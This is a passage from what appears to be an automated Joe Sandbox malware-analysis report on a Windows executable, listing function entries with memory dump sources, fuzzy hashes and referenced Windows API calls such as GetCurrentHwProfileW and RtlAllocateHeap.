                                    • Associated: 00000000.00000002.3921929524.0000000000687000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923852313.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923905340.0000000000844000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923961184.0000000000847000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3924038380.0000000000848000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_270000_Lisect_AVT_24003_G1A_37.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FileWrite
                                    • String ID:
                                    • API String ID: 3934441357-0
                                    • Opcode ID: 4746bff130cfbbae3c66904ed759f7d8c567f7965749060fb01513d808d14b0f
                                    • Instruction ID: d8b00a1656c305182d0de795ba8014fe83f0a16d020abae17b963796dcad6141
                                    • Opcode Fuzzy Hash: 4746bff130cfbbae3c66904ed759f7d8c567f7965749060fb01513d808d14b0f
                                    • Instruction Fuzzy Hash: A861D571D04109AFDF12DFA8C844EEFBFB9AF15304F168145E905AB21AC772DA15CB60
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3930888868.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4e80000_Lisect_AVT_24003_G1A_37.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: 3ac0d79d5545de5b939778e84046ce096787b12fb88039b81c7772ce8b10cf95
                                    • Instruction ID: d8b2f5a72d8489895000d830ea2f28ede4cf33fdd7ef1474b40b753af8074527
                                    • Opcode Fuzzy Hash: 3ac0d79d5545de5b939778e84046ce096787b12fb88039b81c7772ce8b10cf95
                                    • Instruction Fuzzy Hash: 1241DEEB30D115ADFE42A5416B50AFB636DE7E6330732A46EF80FD2142F6946A8D6031
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3930888868.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4e80000_Lisect_AVT_24003_G1A_37.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: d655eb280390bd77e4cc2e59f329ecf313583754d659d2a06974275c18ec00fb
                                    • Instruction ID: 326dabbc114dc4ad3b60e5444a8f6620f4e0d2043c7747e7f30be4740f1d1cd3
                                    • Opcode Fuzzy Hash: d655eb280390bd77e4cc2e59f329ecf313583754d659d2a06974275c18ec00fb
                                    • Instruction Fuzzy Hash: 7D4123EB30C214BDFE42A5416B50AF7676DE7E6330732A46EF80FC2142F6906A8D6031
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3930888868.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4e80000_Lisect_AVT_24003_G1A_37.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: c712b8e0a208b964b087693c0c3e00582574632c7a56c5d71796d21519727f65
                                    • Instruction ID: 0da3a5123357a2ee38b4f14995c1e234a5368499f334836a1603adbbf025c27c
                                    • Opcode Fuzzy Hash: c712b8e0a208b964b087693c0c3e00582574632c7a56c5d71796d21519727f65
                                    • Instruction Fuzzy Hash: 1341D2EB30D115BDFE42A5416B50AF7636DE7E6330732A46EF40FD2141F6946A4D6031
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3930888868.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4e80000_Lisect_AVT_24003_G1A_37.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: a38a74ac1f8b697c257f2d459189e54efaa0a6b8656df336f9f72a22d1bbdfd3
                                    • Instruction ID: 96019f544e3b87f522269904c43d9861f38377a05eaa7e805c0d5788f6bc5548
                                    • Opcode Fuzzy Hash: a38a74ac1f8b697c257f2d459189e54efaa0a6b8656df336f9f72a22d1bbdfd3
                                    • Instruction Fuzzy Hash: E94103EB30D115BDFE42A5412B50AFB676DE7E6330732A46EF40FC6142F6946A8D6031
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3930888868.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4e80000_Lisect_AVT_24003_G1A_37.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: 1fd5befecc9873deae063b46ef591a22026c1ac905798b7c3393898a82a80751
                                    • Instruction ID: f5be663653468723dba52a7249b46aed5d3fb8c3da027c1411b8ebe944f8c797
                                    • Opcode Fuzzy Hash: 1fd5befecc9873deae063b46ef591a22026c1ac905798b7c3393898a82a80751
                                    • Instruction Fuzzy Hash: 8531E2EB30C114ADFE52A5416B50AF7676DEBE6330732A4AEF40FC5142F6947A8D6031
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 04E80CCD
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3930888868.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4e80000_Lisect_AVT_24003_G1A_37.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: eed2d2573df754d9c96716ebbab408848ed3adf8f7f866204c0981401a9eb5f5
                                    • Instruction ID: fc3e288558dc3d409c9cd847ca1a80b70ea68e655516a7789c59a0f49244dd3a
                                    • Opcode Fuzzy Hash: eed2d2573df754d9c96716ebbab408848ed3adf8f7f866204c0981401a9eb5f5
                                    • Instruction Fuzzy Hash: AE318DEB20C110BDFE52A5416B50AFB676DE7E6330732A46EF80FD6242F6946A4D6031
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 04E80CCD
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3930888868.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4e80000_Lisect_AVT_24003_G1A_37.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: ec03e525cb2c386a530442229756d539e5206b0ddac395833df832ff398b33a3
                                    • Instruction ID: 0a7d6fbf0e2de17db3f27aa201f45efea8f3120c6861160331f08ae57ee62fd1
                                    • Opcode Fuzzy Hash: ec03e525cb2c386a530442229756d539e5206b0ddac395833df832ff398b33a3
                                    • Instruction Fuzzy Hash: 8F3107EB30C110AEFE42A9415B54AFB676DEBD6230732946EF40FD6142F2917A4D6031
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 04E80CCD
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3930888868.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4e80000_Lisect_AVT_24003_G1A_37.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: 1837954b3aa31f61bad8475ea9f4e7d33fe7b66c256fe5827a026c6de0b3b528
                                    • Instruction ID: c92d27e612231e029026d7304b3cf14c235abb7919326a22838ffe2361d2c38b
                                    • Opcode Fuzzy Hash: 1837954b3aa31f61bad8475ea9f4e7d33fe7b66c256fe5827a026c6de0b3b528
                                    • Instruction Fuzzy Hash: 9C21C3EB30C110BDFE52A5416B50AFB676DE7D6330732A46EF40FD5242F6946A4D6031
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 04E80CCD
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3930888868.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4e80000_Lisect_AVT_24003_G1A_37.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: 63baaad4e462952d988967f1ed454aded1a78f65be914755c22439ae098d3bb1
                                    • Instruction ID: 35a5fa36770a7635ca8fcec3376c39fcda1f2cb8711e079dfc78097b92d214b1
                                    • Opcode Fuzzy Hash: 63baaad4e462952d988967f1ed454aded1a78f65be914755c22439ae098d3bb1
                                    • Instruction Fuzzy Hash: 0D31C0EB20C110BDFE42A5416B50AFB672DEBE6330732A46EF40FD6242F6947A4D6131
                                    APIs
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 002DBB71
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                    • Associated: 00000000.00000002.3909409252.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3909505303.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913542109.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000633000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.000000000066F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000686000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3921929524.0000000000687000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923852313.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923905340.0000000000844000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923961184.0000000000847000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3924038380.0000000000848000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_270000_Lisect_AVT_24003_G1A_37.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Concurrency::cancel_current_task
                                    • String ID:
                                    • API String ID: 118556049-0
                                    • Opcode ID: b19d2212db506fa46971754378483badd225f06599945ea51feb898bce11e8e1
                                    • Instruction ID: 3493bc3347d194530a5e1f52ceb4cbc310de0ae6c0df0bc55d645c7f2f9314ae
                                    • Opcode Fuzzy Hash: b19d2212db506fa46971754378483badd225f06599945ea51feb898bce11e8e1
                                    • Instruction Fuzzy Hash: D741F172910109DBCB16DF68D881AAEBBA5EF45340F26026AFC05EB345D730EE2187A1
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 04E80CCD
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3930888868.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4e80000_Lisect_AVT_24003_G1A_37.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: 142f56a2baf739bb7966bf19860a49247991136479f42b22f720acae59ade334
                                    • Instruction ID: 2bdb3d69c7b103b1bd52bab450777b0aa78bd7593b62249912ad2a7c934353ff
                                    • Opcode Fuzzy Hash: 142f56a2baf739bb7966bf19860a49247991136479f42b22f720acae59ade334
                                    • Instruction Fuzzy Hash: E12106E730C210AEFE42A5415B50AF7676DEBD6330732946EF40FC6282F6A43A4D6031
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 04E80CCD
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3930888868.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4e80000_Lisect_AVT_24003_G1A_37.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: 90c5c7957c54a8372f2358a6140c8b46ffcac9bc9acbd53aee2a26f3206bbdd1
                                    • Instruction ID: 2256324f7b2baec8b9d49b84b0de687155df6e655a10108d76f274696b3d7333
                                    • Opcode Fuzzy Hash: 90c5c7957c54a8372f2358a6140c8b46ffcac9bc9acbd53aee2a26f3206bbdd1
                                    • Instruction Fuzzy Hash: 762107E730C210AEEE42A5405B506F76769EBD6230732946EF40FD6242F6A47A4DA131
                                    APIs
                                    • FindCloseChangeNotification.KERNELBASE(00000000,00000000,CF830579,?,00362469,00000000,CF830579,003A1148,0000000C,00362525,0035662D,?), ref: 003625D8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                    • Associated: 00000000.00000002.3909409252.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3909505303.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913542109.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000633000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.000000000066F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000686000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3921929524.0000000000687000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923852313.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923905340.0000000000844000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923961184.0000000000847000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3924038380.0000000000848000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_270000_Lisect_AVT_24003_G1A_37.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ChangeCloseFindNotification
                                    • String ID:
                                    • API String ID: 2591292051-0
                                    • Opcode ID: 286ab73df8b5ece42236ad873bcc58558cff6160abf5d4f60e62bf1857fa6543
                                    • Instruction ID: eda741e0289af506d018ac91f80bf5ceab5361ed67f1980d2bf6a0b6065c70fc
                                    • Opcode Fuzzy Hash: 286ab73df8b5ece42236ad873bcc58558cff6160abf5d4f60e62bf1857fa6543
                                    • Instruction Fuzzy Hash: 1C116B3370095016D63363745C55B7FA7598B87734F278309FA0A8F1CADE619C814266
                                    APIs
                                    • SetFilePointerEx.KERNELBASE(00000000,00000000,003A0E00,0034C023,00000002,0034C023,00000000,?,?,?,0035BBD6,00000000,?,0034C023,00000002,003A0E00), ref: 0035BB08
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                    • Associated: 00000000.00000002.3909409252.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3909505303.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913542109.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000633000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.000000000066F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000686000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3921929524.0000000000687000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923852313.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923905340.0000000000844000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923961184.0000000000847000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3924038380.0000000000848000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_270000_Lisect_AVT_24003_G1A_37.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FilePointer
                                    • String ID:
                                    • API String ID: 973152223-0
                                    • Opcode ID: ca1757b03ae904cc734866c98af0ad37c83c338b5ce7752794f6403a6eccf655
                                    • Instruction ID: e5a4ad08b515c46b4e3a904d8b21b24dafb06ce78cf82a181150627fff6bfef2
                                    • Opcode Fuzzy Hash: ca1757b03ae904cc734866c98af0ad37c83c338b5ce7752794f6403a6eccf655
                                    • Instruction Fuzzy Hash: AF010432610144AFCF068F59CC45C9E7B2AEF86331B250208EC119B2A1EBB1ED418B90
                                    APIs
                                    • ___std_exception_copy.LIBVCRUNTIME ref: 00271FDE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                    • Associated: 00000000.00000002.3909409252.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3909505303.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913542109.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000633000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.000000000066F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000686000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3921929524.0000000000687000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923852313.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923905340.0000000000844000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923961184.0000000000847000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3924038380.0000000000848000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_270000_Lisect_AVT_24003_G1A_37.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ___std_exception_copy
                                    • String ID:
                                    • API String ID: 2659868963-0
                                    • Opcode ID: bf9ae28ec7126f94913a97ccfb1cc161a9fbfce2373d2d27c45b81acac976781
                                    • Instruction ID: bae2c6259248d9b8c4e314ce61b7d7fc28630eaf699b51371ac914c0630b48da
                                    • Opcode Fuzzy Hash: bf9ae28ec7126f94913a97ccfb1cc161a9fbfce2373d2d27c45b81acac976781
                                    • Instruction Fuzzy Hash: 0E01DB7581030D67C716AFA9EC018897BECDF02364B508635F9189E951FB70F56487D1
                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000008,0034B16C,?,?,003637E9,00000001,00000364,?,00000006,000000FF,?,0034E0EB,?,?,?,?), ref: 00363EA5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                    • Associated: 00000000.00000002.3909409252.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3909505303.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913542109.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000633000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.000000000066F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000686000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3921929524.0000000000687000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923852313.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923905340.0000000000844000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923961184.0000000000847000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3924038380.0000000000848000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_270000_Lisect_AVT_24003_G1A_37.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0
                                    • Opcode ID: 501876242131078ae54ae27f0c3e772e3ac6f383621d84cb5566920cbce1f582
                                    • Instruction ID: 9cf508669484aed9aedab143ad64e34bee23b5fea34188a404ac7a11de553ab2
                                    • Opcode Fuzzy Hash: 501876242131078ae54ae27f0c3e772e3ac6f383621d84cb5566920cbce1f582
                                    • Instruction Fuzzy Hash: E6F0E933A01525669B336B718A05F5B775DDF41361F16C111BC099A088CB71EE0482F0
                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000000,?,?,?,0034E0EB,?,?,?,?,?,00272D8D,0034B16C,?,?,0034B16C), ref: 003648D0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                    • Associated: 00000000.00000002.3909409252.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3909505303.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913542109.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000633000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.000000000066F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000686000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3921929524.0000000000687000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923852313.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923905340.0000000000844000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923961184.0000000000847000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3924038380.0000000000848000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_270000_Lisect_AVT_24003_G1A_37.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0
                                    • Opcode ID: b4dac2b70884013b9d081ee234dd82b9b9e5d982e5a2cdfb6c863d640954ea35
                                    • Instruction ID: 5d4b73bde628fec0b95a211fa61b662ed0e8efdf11b69f857b2791f602cbf47e
                                    • Opcode Fuzzy Hash: b4dac2b70884013b9d081ee234dd82b9b9e5d982e5a2cdfb6c863d640954ea35
                                    • Instruction Fuzzy Hash: B2E092369026A15AE62337758C05FAB778DCF833B1F178631AC14BB498DB62DC0092E2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3930926346.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4e90000_Lisect_AVT_24003_G1A_37.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 3993a47d10a0a2a6647415d47030e6d76fdb37dad1dab2f3905e8db0bd4193c2
                                    • Instruction ID: ad464931f1a2cd203aa2a02f8fd1a81d2b117e94c8a0b0bec90246b879b6e5b2
                                    • Opcode Fuzzy Hash: 3993a47d10a0a2a6647415d47030e6d76fdb37dad1dab2f3905e8db0bd4193c2
                                    • Instruction Fuzzy Hash: 2221D6AB24C210BEEA4685853B58AF67BEDF3C7330370546BF443C6543E2951E8A7171
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3930926346.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4e90000_Lisect_AVT_24003_G1A_37.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: fb76871b59a9942f46fc48e0f5e4c69fc8c51cf2c018c7d8f8bbe18b0bbb88f8
                                    • Instruction ID: 2f1fade6657163d4c0909d65add22bfc9ff3f0b9eb4de29940d80a15b70a022c
                                    • Opcode Fuzzy Hash: fb76871b59a9942f46fc48e0f5e4c69fc8c51cf2c018c7d8f8bbe18b0bbb88f8
                                    • Instruction Fuzzy Hash: CA21C8AB24C124BEE54684912B549FB7BAEF6C33303709467F843D6583E2C55E4971B1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3930926346.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4e90000_Lisect_AVT_24003_G1A_37.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6f92b0c3ce4efa7be008a6618f3bc7e4a902fd524ca9d27d2fa5d4d7a1826217
                                    • Instruction ID: 4414005d826b01d330b7513505014635554530182a7d65743d242d18db58e07d
                                    • Opcode Fuzzy Hash: 6f92b0c3ce4efa7be008a6618f3bc7e4a902fd524ca9d27d2fa5d4d7a1826217
                                    • Instruction Fuzzy Hash: 012137AB24C224EFDA4198812A54AF77BEDF3867307B06127F803CB582E2955E4562B1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3930926346.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4e90000_Lisect_AVT_24003_G1A_37.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1e25ab1d4012b699f2b420cec6dc444bfc59f5a3f7b2aca0a5db1c81dd3dc517
                                    • Instruction ID: 5b921d1e26669a2fcdc73b39591b85f546ac56164c2b9aa79dbe310991a6857c
                                    • Opcode Fuzzy Hash: 1e25ab1d4012b699f2b420cec6dc444bfc59f5a3f7b2aca0a5db1c81dd3dc517
                                    • Instruction Fuzzy Hash: 221182EB24C124BEF44284812B549FB6BAEF2C37703B09426F803D6542F2C55E4D3071
                                    Memory Dump Source
